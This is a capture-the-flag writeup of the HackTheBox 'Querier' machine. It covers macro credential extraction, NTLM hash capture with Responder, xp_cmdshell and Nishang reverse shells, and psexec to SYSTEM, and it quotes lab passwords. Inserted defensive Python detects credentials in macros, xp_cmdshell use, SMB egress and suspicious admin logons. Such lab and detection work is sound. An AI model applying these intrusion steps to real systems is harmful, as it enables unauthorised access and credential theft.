Querier — HackTheBox Writeup
Querier was an awesome box with some neat things that are good for Windows beginners. The box starts with SMB enumeration, which gives us credentials to log in to the database server. I'll get the host to make an SMB connection back to me, where I can collect the Net-NTLMv2 challenge response, and crack it to get a password. With all that being said,
Let's jump right in.
Enumeration and Recon
Nmap Scan
SMB — TCP 445
The Reports share looks interesting. Let's check what we've got there.
There's a file with an "xlsm" extension. Running the file command against it says that it's a Microsoft Excel document. I tried to open it via Google Sheets only to get trolled. Later I ran binwalk to see what's hidden in the file.
I used oletools to get the macros and found a potential username and password.
Username = reporting
Password = PcwTWTHRwryjc$c6
Database = volume
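A macro-enabled workbook is a zip container, and the VBA project lives in the xl/vbaProject.bin part, which is what oletools extracts and decompresses. The following is an added example, not the author's code and not part of oletools: it builds a constructed stand-in workbook in memory, checks the two indicators that mark a file as macro-enabled (the vbaProject.bin part and its content-type entry), and then scans VBA source text, such as the output olevba prints, for connection-string style credential assignments. The connection string, the host name db01 and the password value are constructed; real vbaProject.bin data is MS-OVBA compressed, so the string scan is meant for the decompressed source, not the raw part.

```python
import io
import re
import zipfile
from typing import Dict, List, Tuple


def build_sample_workbook(with_macros: bool) -> bytes:
    """Constructed stand-in for an Office Open XML workbook (a zip container)."""
    content_types = '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    if with_macros:
        content_types += ('<Override PartName="/xl/vbaProject.bin" '
                          'ContentType="application/vnd.ms-office.vbaProject"/>')
    content_types += "</Types>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("xl/workbook.xml", "<workbook/>")
        if with_macros:
            # A real vbaProject.bin is an OLE container holding MS-OVBA compressed
            # source; a placeholder is enough to exercise the presence check.
            zf.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0placeholder")
    return buf.getvalue()


def macro_indicators(data: bytes) -> Dict[str, bool]:
    """Report whether an OOXML blob carries a VBA part and/or its content type."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        content_types = ""
        if "[Content_Types].xml" in names:
            content_types = zf.read("[Content_Types].xml").decode("utf-8", "replace")
    return {
        "vba_part": any(n.lower().endswith("vbaproject.bin") for n in names),
        "vba_content_type": "vnd.ms-office.vbaproject" in content_types.lower(),
    }


# Constructed VBA source in the shape olevba prints after decompression.
SAMPLE_VBA = '''
Sub Connect()
    Dim conn As Object
    Set conn = CreateObject("ADODB.Connection")
    conn.Open "Driver={SQL Server};Server=db01;Database=volume;Uid=reporting;Pwd=EXAMPLE_PASSWORD;"
End Sub
'''

# Keys that commonly carry credentials in ODBC/OLE DB connection strings.
CRED_PATTERN = re.compile(r'(?i)\b(pwd|password|passwd|uid|user id|username)\s*=\s*"?([^;"\s]+)')


def find_credentials(vba_source: str) -> List[Tuple[str, str]]:
    """Return (key, value) pairs for credential-like assignments in VBA text."""
    return [(m.group(1).lower(), m.group(2)) for m in CRED_PATTERN.finditer(vba_source)]


if __name__ == "__main__":
    print(macro_indicators(build_sample_workbook(with_macros=True)))
    print(macro_indicators(build_sample_workbook(with_macros=False)))
    print(find_credentials(SAMPLE_VBA))
```

Run this over every workbook on a share to list the macro-enabled ones, then feed each one's olevba output to find_credentials; a hit means a secret is sitting in a document that anyone with read access to the share can open.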
MSSQL — 1433
Now that we have the credentials, let's log in to the DB and check what we've got. I tried logging in with sqsh and DBeaver, but they failed for some reason. Later I used the Metasploit auxiliary module auxiliary/admin/mssql/mssql_sql to enumerate the database.
There we go, we get the SQL Server version. Since enumerating with this module is quite slow, I switched to Impacket's mssqlclient to continue enumeration.
Enabling xp_cmdshell failed, so we might have to escalate to a higher-privileged user. Let's grab hashes using Responder.
This is a good article on getting NTLM hashes from Windows.
Run responder -I tun0 -v to start Responder.
Let's crack these hashes with john.
Username = mssql-svc
Password = corporate568
Time to log in to the database again. When I first did this, I logged into MSRPC (port 135) with the above credentials, but couldn't go any further with it.
xp_cmdshell is enabled and we can ping ourselves. Awesome. Time to get a shell.
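From the defender's side, the two things that happened on the SQL Server so far are visible in its statement audit: the server was made to reach out over SMB to a host that is not a file server (which is what hands the Net-NTLMv2 response to Responder), and xp_cmdshell was switched on and then used. The following is an added example, not the author's code: a small triage routine run over constructed audit lines (timestamp, login, statement) that flags statements containing a UNC path to a host outside an allowlist, sp_configure calls that enable xp_cmdshell, and xp_cmdshell executions. The line format, the allowlist, the procedure name dbo.report_export and the IP 10.10.14.5 are all constructed for the example.

```python
import re
from typing import List, Tuple

# Constructed audit lines: "<timestamp> <login> <T-SQL statement>".
SAMPLE_AUDIT = r"""
2019-01-10T09:12:01 reporting SELECT name FROM master..sysdatabases
2019-01-10T09:12:40 reporting EXEC dbo.report_export '\\10.10.14.5\Reports'
2019-01-10T09:20:15 mssql-svc EXEC sp_configure 'show advanced options', 1
2019-01-10T09:20:17 mssql-svc EXEC sp_configure 'xp_cmdshell', 1
2019-01-10T09:20:18 mssql-svc RECONFIGURE
2019-01-10T09:20:30 mssql-svc EXEC xp_cmdshell 'ping 10.10.14.5'
2019-01-10T09:25:00 reporting EXEC dbo.report_export '\\fileserver01\Reports'
""".strip()

# Hosts the SQL Server is expected to talk to over SMB (constructed allowlist).
TRUSTED_SMB_HOSTS = {"fileserver01"}

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(.*)$")
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)\\")
XP_CMDSHELL_ENABLE_RE = re.compile(r"(?i)sp_configure\s+'xp_cmdshell'\s*,\s*1\b")
XP_CMDSHELL_EXEC_RE = re.compile(r"(?i)\bexec(?:ute)?\s+(?:master\.\.)?xp_cmdshell\b")


def triage(audit_text: str) -> List[Tuple[str, str, str]]:
    """Return (login, rule, statement) for every audit line that matches a rule."""
    findings = []
    for raw in audit_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        _ts, login, stmt = m.groups()
        # Enabling xp_cmdshell is checked before execution so the sp_configure
        # line is reported once, under the right rule.
        if XP_CMDSHELL_ENABLE_RE.search(stmt):
            findings.append((login, "xp_cmdshell enabled", stmt))
        elif XP_CMDSHELL_EXEC_RE.search(stmt):
            findings.append((login, "os command via xp_cmdshell", stmt))
        # Any UNC path makes the SQL Server service account authenticate
        # outbound over SMB; flag targets that are not known file servers.
        for host in UNC_RE.findall(stmt):
            if host.lower() not in TRUSTED_SMB_HOSTS:
                findings.append((login, f"smb egress to untrusted host {host}", stmt))
    return findings


if __name__ == "__main__":
    for login, rule, stmt in triage(SAMPLE_AUDIT):
        print(f"{login:10} {rule:45} {stmt}")
```

The sp_configure rule is the cheap one to alert on outright, since on a production instance xp_cmdshell should stay disabled; the UNC rule is the one that catches the hash capture, and its value depends entirely on keeping the allowlist honest. Blocking outbound SMB from the database host at the firewall removes the second class of finding altogether.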
Shell as mssql-svc
I used Nishang's Invoke-PowerShellTcp.ps1 for the reverse shell.
PrivEsc to system
I ran PowerUp.ps1 and, right off the bat, it found admin creds.
Username : Administrator
Password: MyUnclesAreMarioAndLuigi!!1!
Reading flags
net use
Just gets access to the filesystem, but that's all that is needed to get the flags:
Shell as NT AUTHORITY\SYSTEM
Since we have admin creds, we can just use Impacket's psexec.py to log in.
Make sure you download the latest psexec.py file, as I had issues with the file I got after cloning the repo. This shell is slow by nature, so be patient.
PowerShell "run as"
Use the password to create a credential that can be passed to Invoke-Command. In this case, adminShell.ps1 is another Invoke-PowerShellTcp.ps1 with the port changed to 9001:
I tried to use WinRM to get a shell as admin, but it gave me an authorization error.
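Every way of using the recovered admin password shown above (net use, psexec.py, Invoke-Command with a credential) produces a network logon for Administrator on the target, and the psexec-style path additionally installs a service to run its payload. Those are the two Windows events a defender correlates: Security 4624 with logon type 3, and System 7045 (new service installed). The following is an added example, not the author's code: it runs a simple correlation over constructed event records, flagging a built-in admin network logon from a host that is not a known jump host, and any service installed on that machine within a short window after such a logon. The event fields are a reduced subset of the real ones, and the jump-host address 10.0.0.10, the source 10.10.14.5, the host name QUERIER and the service names are all constructed.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List


@dataclass
class Event:
    """Reduced subset of Windows event fields (constructed for the example)."""
    time: datetime
    event_id: int          # 4624 = logon (Security), 7045 = new service installed (System)
    host: str
    account: str = ""
    logon_type: int = 0    # 3 = network
    auth_package: str = "" # NTLM or Kerberos
    source_ip: str = ""
    service_name: str = ""
    image_path: str = ""


JUMP_HOSTS = {"10.0.0.10"}          # where admin sessions are expected to originate
BUILTIN_ADMINS = {"administrator"}
WINDOW = timedelta(seconds=60)      # how close a service install must follow a logon

T0 = datetime(2019, 1, 10, 9, 30, 0)
SAMPLE_EVENTS = [
    Event(T0, 4624, "QUERIER", account="Administrator", logon_type=3,
          auth_package="NTLM", source_ip="10.10.14.5"),
    # Constructed random-looking service name and binary, as a remote-service
    # execution tool typically leaves behind.
    Event(T0 + timedelta(seconds=2), 7045, "QUERIER",
          service_name="XfTqLmBw", image_path=r"%SystemRoot%\XfTqLmBw.exe"),
    Event(T0 + timedelta(minutes=10), 4624, "QUERIER", account="Administrator",
          logon_type=3, auth_package="Kerberos", source_ip="10.0.0.10"),
    Event(T0 + timedelta(minutes=10, seconds=1), 7045, "QUERIER",
          service_name="BackupAgent", image_path=r"C:\Program Files\Backup\agent.exe"),
]


def triage_events(events: List[Event]) -> List[str]:
    """Return human-readable findings for suspicious admin logons and follow-on services."""
    findings = []
    suspicious_logons: List[Event] = []
    for e in sorted(events, key=lambda ev: ev.time):
        if (e.event_id == 4624 and e.logon_type == 3
                and e.account.lower() in BUILTIN_ADMINS
                and e.source_ip not in JUMP_HOSTS):
            findings.append(f"{e.host}: {e.account} network logon ({e.auth_package}) "
                            f"from unexpected source {e.source_ip}")
            suspicious_logons.append(e)
        elif e.event_id == 7045:
            # Only services installed shortly after a suspicious logon on the
            # same host are reported; routine installs are left alone.
            prior = [l for l in suspicious_logons
                     if l.host == e.host and timedelta(0) <= e.time - l.time <= WINDOW]
            if prior:
                gap = int((e.time - prior[-1].time).total_seconds())
                findings.append(f"{e.host}: service '{e.service_name}' ({e.image_path}) "
                                f"installed {gap}s after suspicious admin logon from "
                                f"{prior[-1].source_ip}")
    return findings


if __name__ == "__main__":
    for line in triage_events(SAMPLE_EVENTS):
        print(line)
```

The Kerberos logon from the jump host and the BackupAgent install that follows it produce nothing, which is the point: the rule keys on where the admin session came from, not on the service install alone, so ordinary software deployment does not page anyone. The WinRM route the author tried would leave only the 4624 half of the pattern, so the first rule still fires on it.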
Well, that’s all from me this time. Hope you had a great time reading.
Thanks and Happy Hacking,
Preetham (@cyber01 )